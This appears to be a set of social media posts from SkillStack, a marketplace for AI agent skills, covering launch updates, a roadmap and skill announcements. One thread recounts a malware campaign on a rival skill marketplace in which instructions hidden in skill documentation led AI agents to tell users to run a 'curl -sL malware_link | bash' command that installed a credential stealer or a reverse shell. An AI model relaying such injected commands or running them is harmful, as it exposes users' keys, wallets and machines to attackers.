An update from SkillStack:
We have been working around the clock the past few weeks to finalize SkillStack.
When we initially launched, we were riding the momentum of the AI space. We pushed to get an MVP live (and working) as fast as possible. And we did.
However, the team decided to take a step back, and build the best platform we possibly could. We fully believe the future of work will look like skills, agents, and workflows.
So, we made some hires, brought on some expert help, and have been working on developing the most robust, easy to use platform we possibly could.
🔶 Accounts for sellers with auto payouts, dashboards, and seamless listing
🔶Support, education, and onboarding for buyers to get the absolute most out of their purchases
🔶 AI-assisted writing, image gen, and product creation, so builders can focus on building
🔶 Plus, talks with advisors, agencies, and any other resource we would need to make sure SkillStack reaches the heights we know it will.
Trust us, we want to move faster, too. But we are confident our decision to invest the extra time and resources will be worth it.
Thanks for being as excited as we are.
SkillStack will be live, in its final form, in a few days.
- Michael & Riley
Exactly why the ecosystem needs a marketplace that prioritizes security and utility.
Not another open-source, aggregated catalog because this is what happens.
the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1 week old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the https://t.co/akQxEk9lrb file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine
Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1
this is npm supply chain attacks all over again except the package can THINK and has root access to your life
3 new skills just went live on SkillStack:
Prompt Forge (@exm7777) - Meta-cognition framework to build prompts that actually work
wrAIte Writing (Kevin) - Business writing that sounds like you, not ChatGPT
Book Editor Pro (Marcello) - Gives you $3,000 editorial feedback
All verified and ready to use.
https://t.co/gSjacqC65g
We have been working hard behind the scenes this week to ship a bunch of new features & opportunities for sellers
Also hired another developer to assist with building out the platform
Roadmap:
��� Seller portal – Track analytics, easily upload, and security check skills
• Buyer portal – Access purchased skills, leave feedback, request features, and get easy access to updates
• Affiliate portal – Get paid to promote other skills
We are also launching ads this week, dumping capital into marketing spend, finalizing partnerships, and continuing to build out the sales engine to ensure builders are monetizing as best as they can
Remember: The marketplace is in it's infancy stages, and is only a small piece of the entire infrastructure SkillStack is developing
Excited to continue shipping features and sharing progress
Will be a lot more vocal now that the team has expanded, and focus can shift back towards growth
📈
Three new skills releasing today:
1. Prompt Forge – 6-phase workflow that interviews you, builds architecturally sound prompts, and quality-tests them before delivery
2. wrAIte Writing Skill – Transforms your AI writing from obvious robot-speak into content that reads like a human wrote it
3. Book Editor Pro – A professional editorial analysis system that reads your manuscript and delivers the same structured feedback a $3,000 editor would give you
If you received an email from us with updated TOS:
It was our AI assistant, Darwin, who decided we needed to update all the sellers
Good call, but apologies if the email was...
A little chaotic
the claude code skills ecosystem doesn't have structure yet
you find something on github, you spend time setting it up, and you don't know if it actually works until you've already invested the effort. there's no validation process. no accountability. the person who made it isn't on the hook if it breaks
and that's fine when it's a few thousand developers who know what they're looking at.
but claude code adoption is accelerating. people are coming in who don't have the background to audit what they're installing. they're giving filesystem access to code they found from a stranger
we're building a place where skills get validated before they go live, builders get paid for work that actually functions, and there's someone responsible when something doesn't.
the current model works for now. it won't work at scale
that's what SkillStack will fix